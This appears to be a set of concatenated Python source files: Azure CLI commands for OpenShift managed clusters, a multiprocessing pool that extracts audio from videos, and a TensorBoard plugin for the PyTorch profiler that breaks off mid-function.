"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
    """List OpenShift managed clusters, optionally scoped to one resource group."""
    if resource_group_name:
        clusters = client.list_by_resource_group(resource_group_name)
    else:
        clusters = client.list()
    # Materialize and strip noisy null fields before returning.
    return _remove_osa_nulls(list(clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name,  # pylint: disable=too-many-locals
                     location=None,
                     compute_vm_size="Standard_D4s_v3",
                     compute_count=3,
                     aad_client_app_id=None,
                     aad_client_app_secret=None,
                     aad_tenant_id=None,
                     vnet_prefix="10.0.0.0/8",
                     subnet_prefix="10.0.0.0/24",
                     vnet_peer=None,
                     tags=None,
                     no_wait=False,
                     workspace_id=None,
                     customer_admin_group_id=None):
    """Create an OpenShift (OSA) v3.11 managed cluster.

    Builds compute/infra/master agent pool profiles, sets up the AAD
    identity provider (creating an AAD app when no app id/secret/tenant
    were supplied), optionally enables monitoring, and submits the
    create_or_update request. After creation the AAD app's reply URL is
    updated with the cluster's public hostname.

    :raises CLIError: when the subscription is not enabled for OSA.
    """
    if location is None:
        # Default the cluster location to the resource group's location.
        location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    agent_pool_profiles = []
    agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='compute',  # Must be 12 chars or less before ACS RP adds to it
        count=int(compute_count),
        vm_size=compute_vm_size,
        os_type="Linux",
        role=OpenShiftAgentPoolProfileRole.compute,
        subnet_cidr=subnet_prefix
    )
    agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='infra',  # Must be 12 chars or less before ACS RP adds to it
        count=int(3),
        vm_size="Standard_D4s_v3",
        os_type="Linux",
        role=OpenShiftAgentPoolProfileRole.infra,
        subnet_cidr=subnet_prefix
    )
    agent_pool_profiles.append(agent_node_pool_profile)
    agent_pool_profiles.append(agent_infra_pool_profile)
    agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='master',  # Must be 12 chars or less before ACS RP adds to it
        count=int(3),
        vm_size="Standard_D4s_v3",
        os_type="Linux",
        subnet_cidr=subnet_prefix
    )
    identity_providers = []
    create_aad = False
    # Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
    try:
        client.get(resource_group_name, name)
    except CloudError:
        # Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
        if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
            create_aad = True
        osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
                                           aad_client_app_id=aad_client_app_id,
                                           aad_client_app_secret=aad_client_app_secret,
                                           aad_tenant_id=aad_tenant_id, identifier=None,
                                           name=name, create=create_aad,
                                           customer_admin_group_id=customer_admin_group_id)
        identity_providers.append(
            OpenShiftManagedClusterIdentityProvider(
                name='Azure AD',
                provider=osa_aad_identity
            )
        )
    auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
    default_router_profile = OpenShiftRouterProfile(name='default')
    if vnet_peer is not None:
        from msrestazure.tools import is_valid_resource_id, resource_id
        # A bare vnet name is expanded into a full resource id in this RG.
        if not is_valid_resource_id(vnet_peer):
            vnet_peer = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace='Microsoft.Network', type='virtualNetwork',
                name=vnet_peer
            )
    if workspace_id is not None:
        # Monitoring is enabled only when a workspace id was provided.
        workspace_id = _format_workspace_id(workspace_id)
        monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id)  # pylint: disable=line-too-long
    else:
        monitor_profile = None
    network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
    osamc = OpenShiftManagedCluster(
        location=location, tags=tags,
        open_shift_version="v3.11",
        network_profile=network_profile,
        auth_profile=auth_profile,
        agent_pool_profiles=agent_pool_profiles,
        master_pool_profile=agent_master_pool_profile,
        router_profiles=[default_router_profile],
        monitor_profile=monitor_profile)
    try:
        # long_running_operation_timeout=300
        result = sdk_no_wait(no_wait, client.create_or_update,
                             resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
        result = LongRunningOperation(cmd.cli_ctx)(result)
        instance = client.get(resource_group_name, name)
        # Second pass updates the AAD app's reply URL with the real FQDN.
        # NOTE(review): osa_aad_identity is only bound inside the
        # 'except CloudError' branch above; if the cluster already existed,
        # this line raises NameError — confirm the intended flow.
        _ensure_osa_aad(cmd.cli_ctx,
                        aad_client_app_id=osa_aad_identity.client_id,
                        aad_client_app_secret=osa_aad_identity.secret,
                        aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
                        name=name, create=create_aad)
    except CloudError as ex:
        if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
            raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed')  # pylint: disable=line-too-long
        if "No registered resource provider found for location" in ex.message:
            raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed')  # pylint: disable=line-too-long
        raise ex
def openshift_show(cmd, client, resource_group_name, name):
    """Show a single OpenShift managed cluster with noisy null fields removed."""
    cluster = client.get(resource_group_name, name)
    return _remove_osa_nulls([cluster])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
    """Scale the 'compute' agent pool of an OpenShift managed cluster.

    :param compute_count: Target number of compute nodes.
    """
    instance = client.get(resource_group_name, name)
    # TODO: change this approach when we support multiple agent pools.
    # Find the 'compute' pool; falls back to index 0 when none matches.
    idx = 0
    for i, profile in enumerate(instance.agent_pool_profiles):
        if profile.name.lower() == "compute":
            idx = i
            break
    instance.agent_pool_profiles[idx].count = int(compute_count)  # pylint: disable=no-member
    # null out the AAD profile and add manually the masterAP name because otherwise validation complains
    instance.master_pool_profile.name = "master"
    instance.auth_profile = None
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
    """Enable Log Analytics monitoring on an OpenShift managed cluster."""
    instance = client.get(resource_group_name, name)
    normalized_workspace_id = _format_workspace_id(workspace_id)
    instance.monitor_profile = OpenShiftManagedClusterMonitorProfile(
        enabled=True, workspace_resource_id=normalized_workspace_id)
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
    """Disable Log Analytics monitoring on an OpenShift managed cluster."""
    instance = client.get(resource_group_name, name)
    instance.monitor_profile = OpenShiftManagedClusterMonitorProfile(
        enabled=False, workspace_resource_id=None)
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
|
parallel_to_sound.py | import os
from multiprocessing import Process, Queue
import lib.video as video
class Pool:
    """
    A pool of video downloaders.

    Orchestrates worker processes that extract audio from downloaded
    videos, plus optional logger processes that record ids of failed
    conversions and of videos without sound.
    """

    def __init__(self, classes, source_directory, target_directory, num_workers, failed_save_file, no_sound_save_file):
        # classes: iterable of class names (one sub-dir per class) or None for a flat directory.
        self.classes = classes
        self.source_directory = source_directory
        self.target_directory = target_directory
        self.num_workers = num_workers
        self.failed_save_file = failed_save_file
        self.no_sound_save_file = no_sound_save_file
        # Bounded queues (maxsize=100) so the feeder cannot outrun the workers.
        self.videos_queue = Queue(100)
        self.no_sound_queue = Queue(100)
        self.failed_queue = Queue(100)
        self.workers = []
        self.failed_save_worker = None
        self.no_sound_worker = None

    def feed_videos(self):
        """
        Feed videos to a queue for workers.
        :return: None.
        """
        if self.classes is None:
            # Flat layout: every file in source_directory is a video.
            videos = os.listdir(self.source_directory)
            for filename in videos:
                video_path = os.path.join(self.source_directory, filename)
                # Strip the extension to recover the video id.
                video_id = ".".join(filename.split(".")[:-1])
                target_path = os.path.join(self.target_directory, "{}.mp3".format(video_id))
                self.videos_queue.put((video_id, video_path, self.target_directory, target_path))
        else:
            # Per-class layout: one sub-directory per class (spaces become underscores).
            for class_name in self.classes:
                source_class_dir = os.path.join(self.source_directory, class_name.replace(" ", "_"))
                target_class_dir = os.path.join(self.target_directory, class_name.replace(" ", "_"))
                if os.path.isdir(source_class_dir):
                    if not os.path.isdir(target_class_dir):
                        # when using multiple processes, the folder might have been already created (after the if was evaluated)
                        try:
                            os.makedirs(target_class_dir)
                        except FileExistsError:
                            pass
                    videos = os.listdir(source_class_dir)
                    for filename in videos:
                        video_path = os.path.join(source_class_dir, filename)
                        video_id = ".".join(filename.split(".")[:-1])
                        target_path = os.path.join(target_class_dir, "{}.mp3".format(video_id))
                        self.videos_queue.put((video_id, video_path, target_class_dir, target_path))

    def start_workers(self):
        """
        Start all workers.
        :return: None.
        """
        # start failed conversions logger
        if self.failed_save_file is not None:
            self.failed_save_worker = Process(target=write_failed_worker, args=(self.failed_queue, self.failed_save_file))
            self.failed_save_worker.start()
        # start no sound logger
        if self.no_sound_save_file is not None:
            self.no_sound_worker = Process(target=write_failed_worker, args=(self.no_sound_queue, self.no_sound_save_file))
            self.no_sound_worker.start()
        # start download workers
        for _ in range(self.num_workers):
            worker = Process(target=sound_worker, args=(self.videos_queue, self.failed_queue, self.no_sound_queue))
            worker.start()
            self.workers.append(worker)

    def stop_workers(self):
        """
        Stop all workers.

        Pushes one None sentinel per worker, then joins everything; the
        logger processes are stopped last so they can drain their queues.
        :return: None.
        """
        # send end signal to all download workers
        for _ in range(len(self.workers)):
            self.videos_queue.put(None)
        # wait for the processes to finish
        for worker in self.workers:
            worker.join()
        # end failed videos saver
        if self.failed_save_worker is not None:
            self.failed_queue.put(None)
            self.failed_save_worker.join()
        if self.no_sound_worker is not None:
            self.no_sound_queue.put(None)
            self.no_sound_worker.join()
def sound_worker(videos_queue, failed_queue, no_sound_queue):
    """
    Process video files until a None sentinel arrives on the queue.
    :param videos_queue: Queue of (video_id, video_path, target_dir, target_path) jobs.
    :param failed_queue: Queue for failed videos.
    :param no_sound_queue: Queue for videos with no sound.
    :return: None.
    """
    def _handle(job):
        video_id, video_path, target_class_dir, target_path = job
        if os.path.isfile(target_path):
            return  # already extracted
        if not os.path.isdir(target_class_dir):
            os.makedirs(target_class_dir)
        if not video.video_has_sound(video_path):
            no_sound_queue.put(video_id)
        elif not video.video_to_sound(video_path, target_path):
            failed_queue.put(video_id)

    # iter(get, None) yields jobs until the None sentinel is received.
    for job in iter(videos_queue.get, None):
        _handle(job)
def write_failed_worker(failed_queue, failed_save_file):
    """
    Write failed video ids into a file.

    Appends one id per line until a None sentinel is received.
    :param failed_queue: Queue of failed video ids; None stops the worker.
    :param failed_save_file: Where to save the videos.
    :return: None.
    """
    # Context manager fixes the original's leaked handle: the file is now
    # closed even if a write raises (and 'file' no longer shadows a builtin).
    with open(failed_save_file, "a") as log_file:
        for video_id in iter(failed_queue.get, None):
            log_file.write("{}\n".format(video_id))
|
plugin.py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# --------------------------------------------------------------------------
import atexit
import gzip
import json
import os
import shutil
import sys
import tempfile
import threading
import time
from collections import OrderedDict
from queue import Queue
import werkzeug
from tensorboard.plugins import base_plugin
from werkzeug import exceptions, wrappers
from . import consts, io, utils
from .profiler import RunLoader
from .run import DistributedRunProfile, Run, RunProfile
logger = utils.get_logger()
def decorate_headers(func):
    """Wrap a header-producing function so its result is extended with
    TorchProfilerPlugin.headers (e.g. X-Content-Type-Options)."""
    def wrapper(*args, **kwargs):
        headers = func(*args, **kwargs)
        # Append the plugin-wide headers to whatever the original returned.
        headers.extend(TorchProfilerPlugin.headers)
        return headers
    return wrapper

# Monkey-patch werkzeug's HTTPException so error responses also carry the
# plugin's extra headers.
exceptions.HTTPException.get_headers = decorate_headers(exceptions.HTTPException.get_headers)
class TorchProfilerPlugin(base_plugin.TBPlugin):
"""TensorBoard plugin for Torch Profiler."""
plugin_name = consts.PLUGIN_NAME
headers = [('X-Content-Type-Options', 'nosniff')]
CONTENT_TYPE = 'application/json'
def __init__(self, context: base_plugin.TBContext):
    """Instantiates TorchProfilerPlugin.
    Args:
      context: A base_plugin.TBContext instance.
    """
    super(TorchProfilerPlugin, self).__init__(context)
    self.logdir = io.abspath(context.logdir.rstrip('/'))
    self._load_lock = threading.Lock()
    self._load_threads = []
    # Discovered runs keyed by name; guarded by _runs_lock.
    self._runs = OrderedDict()
    self._runs_lock = threading.Lock()
    # Temporary on-disk cache, cleaned up at interpreter exit (see clean()).
    self._temp_dir = tempfile.mkdtemp()
    self._cache = io.Cache(self._temp_dir)
    self._queue = Queue()
    self._gpu_metrics_file_dict = {}
    # Background daemon threads — presumably one discovers runs under logdir
    # and the other consumes loaded runs from the queue (bodies not in view).
    monitor_runs = threading.Thread(target=self._monitor_runs, name='monitor_runs', daemon=True)
    monitor_runs.start()
    receive_runs = threading.Thread(target=self._receive_runs, name='receive_runs', daemon=True)
    receive_runs.start()
    self.diff_run_cache = {}
    self.diff_run_flatten_cache = {}
    def clean():
        logger.debug('starting cleanup...')
        self._cache.__exit__(*sys.exc_info())
        logger.debug('remove temporary cache directory %s' % self._temp_dir)
        shutil.rmtree(self._temp_dir)
    # Remove the temp cache directory when the process exits.
    atexit.register(clean)
def is_active(self):
    """Returns whether there is relevant data for the plugin to process.
    If there is no any pending run, hide the plugin
    """
    if self.is_loading:
        return True
    with self._runs_lock:
        return bool(self._runs)
def get_plugin_apps(self):
    """Map URL routes to their WSGI handlers (static assets plus JSON APIs)."""
    return {
        '/index.js': self.static_file_route,
        '/index.html': self.static_file_route,
        '/trace_viewer_full.html': self.static_file_route,
        '/trace_embedding.html': self.static_file_route,
        '/runs': self.runs_route,
        '/views': self.views_route,
        '/workers': self.workers_route,
        '/spans': self.spans_route,
        '/overview': self.overview_route,
        '/operation': self.operation_pie_route,
        '/operation/table': self.operation_table_route,
        '/operation/stack': self.operation_stack_route,
        '/kernel': self.kernel_pie_route,
        '/kernel/table': self.kernel_table_route,
        '/kernel/tc_pie': self.kernel_tc_route,
        '/trace': self.trace_route,
        '/distributed/gpuinfo': self.dist_gpu_info_route,
        '/distributed/overlap': self.comm_overlap_route,
        '/distributed/waittime': self.comm_wait_route,
        '/distributed/commops': self.comm_ops_route,
        '/memory': self.memory_route,
        '/memory_curve': self.memory_curve_route,
        '/memory_events': self.memory_events_route,
        '/module': self.module_route,
        '/tree': self.op_tree_route,
        '/diff': self.diff_run_route,
        '/diffnode': self.diff_run_node_route,
    }
def frontend_metadata(self):
    """Declare the frontend's ES module entry point (with reload disabled)."""
    metadata = base_plugin.FrontendMetadata(es_module_path='/index.js', disable_reload=True)
    return metadata
@wrappers.Request.application
def runs_route(self, request: werkzeug.Request):
    """Return the names of all known runs plus the loading flag."""
    with self._runs_lock:
        run_names = list(self._runs.keys())
    payload = {
        'runs': run_names,
        'loading': self.is_loading
    }
    return self.respond_as_json(payload)
@wrappers.Request.application
def views_route(self, request: werkzeug.Request):
    """Return the display names of the views available for a run."""
    run_name = request.args.get('run')
    self._validate(run=run_name)
    run = self._get_run(run_name)
    return self.respond_as_json([view.display_name for view in run.views])
@wrappers.Request.application
def workers_route(self, request: werkzeug.Request):
    """Return the workers that have data for the requested run and view."""
    run_name = request.args.get('run')
    view_name = request.args.get('view')
    self._validate(run=run_name, view=view_name)
    return self.respond_as_json(self._get_run(run_name).get_workers(view_name))
@wrappers.Request.application
def spans_route(self, request: werkzeug.Request):
    """Return the profiling spans recorded for a worker within a run."""
    run_name = request.args.get('run')
    worker_name = request.args.get('worker')
    self._validate(run=run_name, worker=worker_name)
    return self.respond_as_json(self._get_run(run_name).get_spans(worker_name))
@wrappers.Request.application
def overview_route(self, request: werkzeug.Request):
    """Overview page payload: step breakdown, environment and GPU summary."""
    profile = self._get_profile_for_request(request)
    name = request.args.get('run')
    run = self._get_run(name)
    # NOTE(review): this aliases profile.overview and then writes keys into it,
    # so the cached overview dict is mutated on every request — confirm intended.
    data = profile.overview
    is_gpu_used = profile.has_runtime or profile.has_kernel or profile.has_memcpy_or_memset
    # 'All' is the synthetic aggregate worker, not a real one.
    normal_workers = [worker for worker in run.workers if worker != 'All']
    data['environments'] = [{'title': 'Number of Worker(s)', 'value': str(len(normal_workers))},
                            {'title': 'Device Type', 'value': 'GPU' if is_gpu_used else 'CPU'}]
    if profile.gpu_summary and profile.gpu_tooltip:
        data['gpu_metrics'] = {'title': 'GPU Summary',
                               'data': profile.gpu_summary,
                               'tooltip': profile.gpu_tooltip}
    return self.respond_as_json(data)
@wrappers.Request.application
def operation_pie_route(self, request: werkzeug.Request):
    """Operator pie chart, grouped by name or by name + input shape."""
    profile = self._get_profile_for_request(request)
    by_shape = request.args.get('group_by') == 'OperationAndInputShape'
    data = profile.operation_pie_by_name_input if by_shape else profile.operation_pie_by_name
    return self.respond_as_json(data)
@wrappers.Request.application
def operation_table_route(self, request: werkzeug.Request):
    """Operator table, grouped by name or by name + input shape."""
    profile = self._get_profile_for_request(request)
    by_shape = request.args.get('group_by') == 'OperationAndInputShape'
    data = profile.operation_table_by_name_input if by_shape else profile.operation_table_by_name
    return self.respond_as_json(data)
@wrappers.Request.application
def operation_stack_route(self, request: werkzeug.Request):
    """Call-stack breakdown for one operator (optionally keyed by input shape)."""
    profile = self._get_profile_for_request(request)
    op_name = request.args.get('op_name')
    self._validate(op_name=op_name)
    group_by = request.args.get('group_by')
    input_shape = request.args.get('input_shape')
    if group_by == 'OperationAndInputShape':
        key = str(op_name) + '###' + str(input_shape)
        return self.respond_as_json(profile.operation_stack_by_name_input[key])
    return self.respond_as_json(profile.operation_stack_by_name[str(op_name)])
@wrappers.Request.application
def kernel_pie_route(self, request: werkzeug.Request):
    """Kernel-view pie-chart data for the requested profile."""
    prof = self._get_profile_for_request(request)
    return self.respond_as_json(prof.kernel_pie)
@wrappers.Request.application
def kernel_table_route(self, request: werkzeug.Request):
    """Kernel table, grouped per kernel or per kernel + launching operator."""
    profile = self._get_profile_for_request(request)
    if request.args.get('group_by') == 'Kernel':
        return self.respond_as_json(profile.kernel_table)
    return self.respond_as_json(profile.kernel_op_table)
@wrappers.Request.application
def kernel_tc_route(self, request: werkzeug.Request):
    """Tensor Cores utilization pie-chart data for the requested profile."""
    prof = self._get_profile_for_request(request)
    return self.respond_as_json(prof.tc_pie)
@wrappers.Request.application
def trace_route(self, request: werkzeug.Request):
    """Serve the chrome trace for a profile; the body is always gzip-encoded.

    For GPU traces, GPU-metric events are appended once and the augmented,
    compressed result is cached in a temp file keyed by the trace path.
    """
    profile = self._get_profile_for_request(request)
    if not profile.has_kernel:  # Pure CPU.
        raw_data = self._cache.read(profile.trace_file_path)
        # Compress on the fly so the body matches the gzip header set below.
        if not profile.trace_file_path.endswith('.gz'):
            raw_data = gzip.compress(raw_data, 1)
    else:
        # Reuse the previously built gzip file with GPU metrics, if any.
        file_with_gpu_metrics = self._gpu_metrics_file_dict.get(profile.trace_file_path)
        if file_with_gpu_metrics:
            # NOTE(review): `io` here appears to be the plugin's file helper
            # module (it also provides walk/abspath below), not stdlib io — confirm.
            raw_data = io.read(file_with_gpu_metrics)
        else:
            raw_data = self._cache.read(profile.trace_file_path)
            if profile.trace_file_path.endswith('.gz'):
                raw_data = gzip.decompress(raw_data)
            # presumably append_gpu_metrics returns gzip-compressed bytes,
            # given the .json.gz suffix and the comment below — TODO confirm.
            raw_data = profile.append_gpu_metrics(raw_data)
            # write the data to temp file
            fp = tempfile.NamedTemporaryFile('w+b', suffix='.json.gz', dir=self._temp_dir, delete=False)
            fp.close()
            # Already compressed, no need to gzip.open
            with open(fp.name, mode='wb') as file:
                file.write(raw_data)
            self._gpu_metrics_file_dict[profile.trace_file_path] = fp.name
    headers = [('Content-Encoding', 'gzip')]
    headers.extend(TorchProfilerPlugin.headers)
    return werkzeug.Response(raw_data, content_type=TorchProfilerPlugin.CONTENT_TYPE, headers=headers)
@wrappers.Request.application
def dist_gpu_info_route(self, request: werkzeug.Request):
    """Per-node GPU hardware info for the distributed view."""
    dist_profile = self._get_distributed_profile_for_request(request)
    return self.respond_as_json(dist_profile.gpu_info)
@wrappers.Request.application
def comm_overlap_route(self, request: werkzeug.Request):
    """Computation/communication overlap per step for the distributed view."""
    dist_profile = self._get_distributed_profile_for_request(request)
    return self.respond_as_json(dist_profile.steps_to_overlap)
@wrappers.Request.application
def comm_wait_route(self, request: werkzeug.Request):
    """Communication wait time per step for the distributed view."""
    dist_profile = self._get_distributed_profile_for_request(request)
    return self.respond_as_json(dist_profile.steps_to_wait)
@wrappers.Request.application
def comm_ops_route(self, request: werkzeug.Request):
    """Communication-operator statistics for the distributed view."""
    dist_profile = self._get_distributed_profile_for_request(request)
    return self.respond_as_json(dist_profile.comm_ops)
@wrappers.Request.application
def memory_route(self, request: werkzeug.Request):
    """Memory statistics, optionally restricted to [start_ts, end_ts]."""
    profile = self._get_profile_for_request(request)
    start_ts = request.args.get('start_ts', None)
    end_ts = request.args.get('end_ts', None)
    memory_metric = request.args.get('memory_metric', 'KB')
    # Timestamps arrive as strings; absent means "unbounded".
    start_ts = int(start_ts) if start_ts is not None else None
    end_ts = int(end_ts) if end_ts is not None else None
    stats = profile.get_memory_stats(start_ts=start_ts, end_ts=end_ts, memory_metric=memory_metric)
    return self.respond_as_json(stats, True)
@wrappers.Request.application
def memory_curve_route(self, request: werkzeug.Request):
    """Time-series memory-usage curve for the requested profile."""
    profile = self._get_profile_for_request(request)
    curve = profile.get_memory_curve(
        time_metric=request.args.get('time_metric', 'ms'),
        memory_metric=request.args.get('memory_metric', 'MB'))
    return self.respond_as_json(curve, True)
@wrappers.Request.application
def memory_events_route(self, request: werkzeug.Request):
    """Individual allocation events, optionally restricted to [start_ts, end_ts]."""
    profile = self._get_profile_for_request(request)
    start_ts = request.args.get('start_ts', None)
    end_ts = request.args.get('end_ts', None)
    time_metric = request.args.get('time_metric', 'ms')
    memory_metric = request.args.get('memory_metric', 'KB')
    # Timestamps arrive as strings; absent means "unbounded".
    start_ts = int(start_ts) if start_ts is not None else None
    end_ts = int(end_ts) if end_ts is not None else None
    events = profile.get_memory_events(start_ts, end_ts, time_metric=time_metric,
                                       memory_metric=memory_metric)
    return self.respond_as_json(events, True)
@wrappers.Request.application
def module_route(self, request: werkzeug.Request):
    """Module-view tree for a profile; 404 when the run has no module data."""
    profile = self._get_profile_for_request(request)
    content = profile.get_module_view()
    if not content:
        name = request.args.get('run')
        worker = request.args.get('worker')
        span = request.args.get('span')
        raise exceptions.NotFound('could not find the run for %s/%s/%s' % (name, worker, span))
    return self.respond_as_json(content, True)
@wrappers.Request.application
def op_tree_route(self, request: werkzeug.Request):
    """Full operator call tree for the requested profile."""
    prof = self._get_profile_for_request(request)
    return self.respond_as_json(prof.get_operator_tree(), True)
@wrappers.Request.application
def diff_run_route(self, request: werkzeug.Request):
    """Top-level diff summary between a baseline run and an experimental run."""
    base, exp = self.get_diff_runs(request)
    summary = self.get_diff_status(base, exp).get_diff_tree_summary()
    return self.respond_as_json(summary, True)
@wrappers.Request.application
def diff_run_node_route(self, request: werkzeug.Request):
    """Diff summary for one node of the diff tree, addressed by its path."""
    base, exp = self.get_diff_runs(request)
    path = request.args.get('path', '0')
    diff_stat = self.get_diff_stats_dict(base, exp).get(path)
    if diff_stat is None:
        raise exceptions.NotFound('could not find diff run for %s' % (path))
    return self.respond_as_json(diff_stat.get_diff_node_summary(path), True)
@wrappers.Request.application
def static_file_route(self, request: werkzeug.Request):
    """Serve a bundled static asset named by the final request-path segment."""
    filename = os.path.basename(request.path)  # basename strips any directory parts
    extension = os.path.splitext(filename)[1]
    mimetype = {
        '.html': 'text/html',
        '.css': 'text/css',
        '.js': 'application/javascript',
    }.get(extension, 'application/octet-stream')
    filepath = os.path.join(os.path.dirname(__file__), 'static', filename)
    try:
        with open(filepath, 'rb') as infile:
            contents = infile.read()
    except IOError:
        raise exceptions.NotFound('404 Not Found')
    return werkzeug.Response(
        contents, content_type=mimetype, headers=TorchProfilerPlugin.headers
    )
@staticmethod
def respond_as_json(obj, compress: bool = False):
    """Serialize *obj* to JSON in a werkzeug Response, optionally gzip-compressed."""
    content = json.dumps(obj)
    headers = list(TorchProfilerPlugin.headers)
    if not compress:
        return werkzeug.Response(content, content_type=TorchProfilerPlugin.CONTENT_TYPE, headers=headers)
    # Fastest gzip level: these payloads are served once per page view.
    raw_data = gzip.compress(content.encode('utf-8'), 1)
    headers.append(('Content-Encoding', 'gzip'))
    return werkzeug.Response(raw_data, content_type=TorchProfilerPlugin.CONTENT_TYPE, headers=headers)
@property
def is_loading(self):
    """True while any background run-loading thread is still registered."""
    with self._load_lock:
        return bool(self._load_threads)
def get_diff_runs(self, request: werkzeug.Request):
    """Resolve the (baseline, experimental) profiles named in a diff request."""
    base_name = request.args.get('run')
    base_span = request.args.get('span')
    base_worker = request.args.get('worker')
    self._validate(run=base_name, worker=base_worker, span=base_span)
    base = self._get_profile(base_name, base_worker, base_span)
    exp_name = request.args.get('exp_run')
    exp_span = request.args.get('exp_span')
    exp_worker = request.args.get('exp_worker')
    self._validate(exp_run=exp_name, exp_worker=exp_worker, exp_span=exp_span)
    exp = self._get_profile(exp_name, exp_worker, exp_span)
    return base, exp
def get_diff_status(self, base: RunProfile, exp: RunProfile):
    """Return (and memoize) the diff tree between two run profiles."""
    key = (base, exp)
    cached = self.diff_run_cache.get(key)
    if cached is not None:
        return cached
    computed = base.compare_run(exp)
    self.diff_run_cache[key] = computed
    return computed
def get_diff_stats_dict(self, base: RunProfile, exp: RunProfile):
    """Return (and memoize) the flattened path -> diff-node map for two profiles."""
    key = (base, exp)
    cached = self.diff_run_flatten_cache.get(key)
    if cached is not None:
        return cached
    flattened = self.get_diff_status(base, exp).flatten_diff_tree()
    self.diff_run_flatten_cache[key] = flattened
    return flattened
def _monitor_runs(self):
    """Background loop: watch logdir for new run directories and load them.

    Each newly seen directory is loaded on its own thread so the UI does not
    stall; if every run directory disappears, the run table is cleared.
    """
    logger.info('Monitor runs begin')
    try:
        touched = set()
        while True:
            try:
                logger.debug('Scan run dir')
                run_dirs = self._get_run_dirs()
                has_dir = False
                # Assume no deletion on run directories, trigger async load if find a new run
                for run_dir in run_dirs:
                    has_dir = True
                    if run_dir not in touched:
                        touched.add(run_dir)
                        logger.info('Find run directory %s', run_dir)
                        # Use threading to avoid UI stall and reduce data parsing time
                        t = threading.Thread(target=self._load_run, args=(run_dir,))
                        t.start()
                        with self._load_lock:
                            self._load_threads.append(t)
                if not has_dir:
                    # handle directory removed case.
                    # Bug fix: guard the shared run table with _runs_lock like
                    # every other access (_receive_runs, runs_route, _get_run).
                    with self._runs_lock:
                        self._runs.clear()
            except Exception as ex:
                logger.warning('Failed to scan runs. Exception=%s', ex, exc_info=True)
            time.sleep(consts.MONITOR_RUN_REFRESH_INTERNAL_IN_SECONDS)
    except Exception:
        logger.exception('Failed to start monitor_runs')
def _receive_runs(self):
    """Consumer loop: drain loaded runs from the queue into self._runs."""
    while True:
        run: Run = self._queue.get()
        if run is None:
            # NOTE(review): None is skipped rather than treated as a shutdown
            # sentinel (no break) — confirm this is intentional.
            continue
        logger.info('Add run %s', run.name)
        with self._runs_lock:
            is_new = run.name not in self._runs
            self._runs[run.name] = run
            if is_new:
                # Keep runs sorted by name so the UI lists them deterministically.
                self._runs = OrderedDict(sorted(self._runs.items()))
def _get_run_dirs(self):
    """Scan logdir and yield every PyTorch Profiler run directory.

    A directory is considered to be a run if it contains 1 or more
    *.pt.trace.json[.gz] files, e.g.:
        /run1/[worker1].pt.trace.json.gz
        /run2/[worker1].pt.trace.json
    """
    for root, _, files in io.walk(self.logdir):
        if any(utils.is_chrome_trace_file(f) for f in files):
            yield root
def _load_run(self, run_dir):
    """Worker-thread entry: parse one run directory, enqueue the resulting Run,
    then unregister this thread from the loading list."""
    # Fallback for the error log in case _get_run_name itself raises; the
    # original code could hit an UnboundLocalError on `name` here.
    name = run_dir
    try:
        name = self._get_run_name(run_dir)
        logger.info('Load run %s', name)
        # Currently, assume run data is immutable, so just load once
        loader = RunLoader(name, run_dir, self._cache)
        run = loader.load()
        logger.info('Run %s loaded', name)
        self._queue.put(run)
    except Exception as ex:
        # Bug fix: the arguments were passed as (ex, name), swapped relative
        # to the 'Failed to load run %s. Exception=%s' format string.
        logger.warning('Failed to load run %s. Exception=%s', name, ex, exc_info=True)
    t = threading.current_thread()
    with self._load_lock:
        try:
            self._load_threads.remove(t)
        except ValueError:
            logger.warning('could not find the thread {}'.format(run_dir))
def _get_run(self, name) -> Run:
    """Look up a loaded run by name; raise 404 NotFound when absent."""
    with self._runs_lock:
        run = self._runs.get(name, None)
        if run is None:
            raise exceptions.NotFound('could not find the run for %s' % (name))
        return run
def _get_run_name(self, run_dir):
    """Display name for a run: the directory basename when run_dir is logdir
    itself, otherwise its path relative to logdir."""
    # NOTE(review): `io` is the plugin's path helper module (abspath/basename/
    # relpath/walk), not the stdlib io module — confirm.
    logdir = io.abspath(self.logdir)
    if run_dir == logdir:
        name = io.basename(run_dir)
    else:
        name = io.relpath(run_dir, logdir)
    return name
def _get_profile_for_request(self, request: werkzeug.Request) -> RunProfile:
    """Extract run/worker/span from the query string and fetch the RunProfile."""
    name = request.args.get('run')
    span = request.args.get('span')
    worker = request.args.get('worker')
    self._validate(run=name, worker=worker)
    profile = self._get_profile(name, worker, span)
    if isinstance(profile, RunProfile):
